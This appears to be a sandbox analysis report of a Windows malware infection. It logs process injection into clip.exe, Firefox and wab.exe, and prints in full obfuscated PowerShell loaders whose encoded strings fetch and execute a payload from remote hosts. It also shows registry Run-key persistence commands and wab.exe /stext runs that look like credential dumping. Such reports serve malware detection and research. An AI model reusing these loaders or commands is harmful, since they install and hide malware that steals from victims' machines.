Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: read write
Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\clip.exe Thread register set: target process: 6292
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\clip.exe Thread APC queued: target process: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 295FC44 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E50000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E3F83C
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beei
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x 